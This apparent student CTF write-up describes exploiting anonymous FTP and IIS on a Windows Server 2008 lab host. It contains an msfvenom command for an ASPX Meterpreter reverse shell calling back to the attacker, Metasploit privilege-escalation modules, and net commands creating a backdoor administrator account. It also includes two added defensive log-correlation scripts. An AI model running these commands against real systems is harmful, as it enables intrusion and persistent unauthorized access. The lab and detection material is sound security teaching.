Project 2 Privilege Escalation - In This Project You Are Assigned To
The assignment involves performing privilege escalation on a Windows Server 2008 system within a Capture-the-Flag (CTF) environment. The task includes exploiting vulnerable FTP and HTTP services, initially gaining an unprivileged shell via the Metasploit Framework, and then escalating privileges to obtain a high-level administrator shell. After successful privilege escalation, the objective is to create an administrator account on the target system to maintain persistent access.
Actions will be performed exclusively from Kali Linux. The process includes conducting network reconnaissance, exploiting services through a reverse ASPX shell, and carefully escalating privileges using Metasploit modules. The steps involve port scanning with Nmap, checking anonymous FTP login, uploading a web shell, establishing reverse connections, and exploiting known vulnerabilities to escalate from a low-privileged shell to SYSTEM-level access. Following privilege escalation, a backdoor administrator account will be created on the Windows server.
Paper for the above instruction
Privilege escalation remains a crucial phase in any penetration testing or ethical hacking exercise, especially within Windows environments, which are commonly targeted because of their widespread use and well-documented vulnerabilities. This project demonstrates a structured approach to exploiting vulnerabilities in Windows Server 2008, focusing on its FTP and HTTP services and using tools such as Kali Linux, Nmap, the Metasploit Framework, and a custom web shell.
The initial reconnaissance involves port scanning with Nmap to identify open services. Using the command `nmap -sV 192.168.2.11`, the tester detects open ports and service versions, which provide vital information about potential entry points. The next step checks the FTP server's anonymous login feature by executing `nmap --script ftp-anon -p 21 192.168.2.11`, which reveals whether anonymous access is permitted. An FTP server that accepts anonymous logins is a weakness in itself; if the anonymous account can also write, it allows the attacker to upload malicious files such as web shells.
The attacker then verifies the web and FTP service configurations by accessing the server via Firefox. The page served by the Windows 2008 host gives insight into the server's web application environment, while anonymous FTP access allows directory exploration. Notably, both services share the same home directory, which means that a web shell uploaded over FTP can be executed through the web application, a common weakness when the FTP root and the web root are not kept separate.
To exploit the web service, a reverse shell payload is generated with `msfvenom` for 64-bit Windows using the command `msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.10 lport=443 -f aspx > reverseshell.aspx`. This payload is uploaded to the server via FTP. A matching handler is then configured on Kali Linux using Metasploit's `exploit/multi/handler` module, with its payload, host and port settings matching the generated payload, so that it listens for the incoming reverse connection.
Once the ASPX reverse shell has been uploaded and is invoked from the Firefox browser, the attacker gains a Meterpreter session. Initially this session runs with low privileges, typically under an application pool identity such as "iis apppool\asp.net v4.0". The attacker confirms the privilege level with `whoami` and attempts actions that require elevated rights, such as creating a new user or deleting system files, which confirms the limited permissions of that account.
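The sequence described above (an anonymous FTP `STOR` of an `.aspx` file into a directory the web server also serves, followed by a browser request for that file) leaves a clear trace in the server's FTP and IIS logs. The following script is an added example, not part of the original project, of how a defender could correlate the two: it parses W3C-style log text using the `#Fields:` header, picks out successful uploads of script-handler files, and reports whether the web server served the same path shortly afterwards. The log lines and the `SCRIPT_EXTENSIONS` set are constructed for the example.

```python
"""Web shell drop detection over constructed FTP and IIS (W3C) log lines:
an anonymous STOR of a script file followed by an HTTP request for the same path."""
import posixpath
from datetime import datetime, timedelta

# Extensions IIS hands to a script engine (assumption; extend to match your handler mappings).
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".svc", ".php"}

# Constructed sample logs. Field names follow W3C extended log conventions and the
# parser maps columns from the #Fields: header, so a different column order is fine.
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-03-01 10:02:11 192.168.2.10 - USER anonymous 331
2024-03-01 10:02:11 192.168.2.10 anonymous PASS *** 230
2024-03-01 10:02:40 192.168.2.10 anonymous STOR /reverseshell.aspx 226
2024-03-01 10:03:05 192.168.2.10 anonymous STOR /readme.txt 226
"""

WEB_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-03-01 10:01:00 192.168.2.12 GET /index.html 200
2024-03-01 10:03:10 192.168.2.10 GET /reverseshell.aspx 200
2024-03-01 10:04:00 192.168.2.12 GET /readme.txt 200
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields: header."""
    fields, records = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line or (line.startswith("#") and not line.startswith("#Fields:")):
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # no header yet or malformed line: skip rather than mis-map columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def script_uploads(ftp_records):
    """Successful STOR commands whose target has a script-handler extension."""
    return [r for r in ftp_records
            if r["cs-method"] == "STOR"
            and r["sc-status"].startswith("2")
            and posixpath.splitext(r["cs-uri-stem"].lower())[1] in SCRIPT_EXTENSIONS]


def correlate(ftp_log, web_log, window=timedelta(hours=1)):
    """One alert per script upload, noting whether the web server then served it."""
    web = parse_w3c(web_log)
    alerts = []
    for up in script_uploads(parse_w3c(ftp_log)):
        path = up["cs-uri-stem"].lower()
        served = [w for w in web
                  if w["cs-uri-stem"].lower() == path
                  and up["ts"] <= w["ts"] <= up["ts"] + window]
        alerts.append({
            "path": up["cs-uri-stem"],
            "uploader": up["c-ip"],
            "anonymous": up["cs-username"].lower() == "anonymous",
            "executed": bool(served),
            "first_request_from": served[0]["c-ip"] if served else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(FTP_LOG, WEB_LOG):
        print(alert)
```

Matching on the bare URI works here because the FTP root and the web root are the same directory, which is exactly the misconfiguration the exercise relies on; where the two roots differ, the FTP path has to be mapped onto the web path before comparing. An upload of a script file by the anonymous account is worth an alert on its own, even before the web server is seen serving it.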
The attacker then attempts privilege escalation using Metasploit's local exploit modules. The first step is to background the initial session (`background`) and use `search` to find relevant exploits. Running the `post/multi/recon/local_exploit_suggester` module against the session identifies candidate local privilege escalation exploits, such as `ms16_075_reflection` and `ms16_014_wmi_recv_notif`. Successive exploitation attempts seek to elevate privileges from the web service's application pool account to SYSTEM level.
Successful privilege escalation is confirmed when a new session reports SYSTEM-level privileges. This privilege level permits the attacker to modify system settings, create new administrator accounts, and install persistent backdoors. In this case, a new user "ms_service" is created with `net user ms_service mypass123 /add` and added to the Administrators group with `net localgroup administrators ms_service /add`. This gives the attacker persistent access even if the original vulnerabilities are patched later.
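The two `net` commands above generate Windows Security events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group), and because the shell is running as SYSTEM the subject of both events is the computer account rather than a named user. The following added example, which is not part of the original project, shows how a defender could flag that pattern from exported event data: it pairs each 4732 into a privileged group with the 4720 that created the member within a time window, and separately flags account creation from a system context. The event records, the host name `WIN2008$`, and the `PRIVILEGED_GROUPS` set are constructed assumptions; the field names match those of the real events.

```python
"""Backdoor-admin detection over constructed Windows Security events:
4720 (user account created) followed by 4732 (member added to a local group)."""
from datetime import datetime, timedelta

# Local groups whose membership grants elevated rights (assumption; extend as needed).
PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "backup operators"}

# Constructed events using the field names of the real 4720/4732 events. A process
# running as LocalSystem is logged with the computer account (HOST$) as the subject.
EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-03-01T09:00:00", "SubjectUserName": "jsmith",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1-2-3-1006"},
    {"EventID": 4732, "TimeCreated": "2024-03-01T09:00:30", "SubjectUserName": "jsmith",
     "TargetUserName": "Users", "MemberSid": "S-1-5-21-1-2-3-1006"},
    {"EventID": 4720, "TimeCreated": "2024-03-01T10:20:01", "SubjectUserName": "WIN2008$",
     "TargetUserName": "ms_service", "TargetSid": "S-1-5-21-1-2-3-1007"},
    {"EventID": 4732, "TimeCreated": "2024-03-01T10:20:03", "SubjectUserName": "WIN2008$",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1-2-3-1007"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def detect_backdoor_admins(events, window=timedelta(hours=24)):
    """Return {account: [reasons]} for accounts created and then made privileged."""
    created = {}   # TargetSid -> the 4720 event that created the account
    alerts = {}

    def flag(account, reason):
        alerts.setdefault(account, set()).add(reason)

    for e in sorted(events, key=_ts):
        if e["EventID"] == 4720:
            created[e["TargetSid"]] = e
            if e["SubjectUserName"].endswith("$"):
                flag(e["TargetUserName"], "created-from-system-context")
        elif e["EventID"] == 4732 and e["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            origin = created.get(e["MemberSid"])
            if origin is None or _ts(e) - _ts(origin) > window:
                continue  # membership change for an established account: not this rule's concern
            flag(origin["TargetUserName"], "new-account-added-to-" + e["TargetUserName"].lower())
            if e["SubjectUserName"].endswith("$"):
                flag(origin["TargetUserName"], "group-change-from-system-context")
    return {account: sorted(reasons) for account, reasons in alerts.items()}


if __name__ == "__main__":
    for account, reasons in detect_backdoor_admins(EVENTS).items():
        print(account, reasons)
```

Correlating on the SID rather than the account name avoids a miss when the account is renamed between the two events, and sorting by timestamp lets the rule run over a batch export in any order. The benign `svc_backup` creation is ignored because it is added only to `Users`.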
This exploitation chain reveals multiple weaknesses in the Windows Server 2008 host's web, FTP, and privilege management configurations. It underscores the importance of disabling anonymous FTP login, applying patches promptly, and following the principle of least privilege to limit the impact of such exploits. Keeping the web server's directories separate from writable FTP directories and running regular vulnerability assessments are critical defenses. Web shells, privilege escalation modules, and reverse payloads are key techniques for security testing, but they also show the danger when misconfigured or outdated systems are exploited by malicious actors.
This exercise emphasizes the importance of a layered security approach, including regular software updates, strong access controls, and comprehensive monitoring. It also illustrates how attackers leverage known vulnerabilities, social engineering, or misconfigurations to compromise systems. Administrators and cybersecurity professionals should be aware of these attack vectors to strengthen defenses and conduct effective penetration testing to identify and mitigate vulnerabilities before malicious adversaries can exploit them.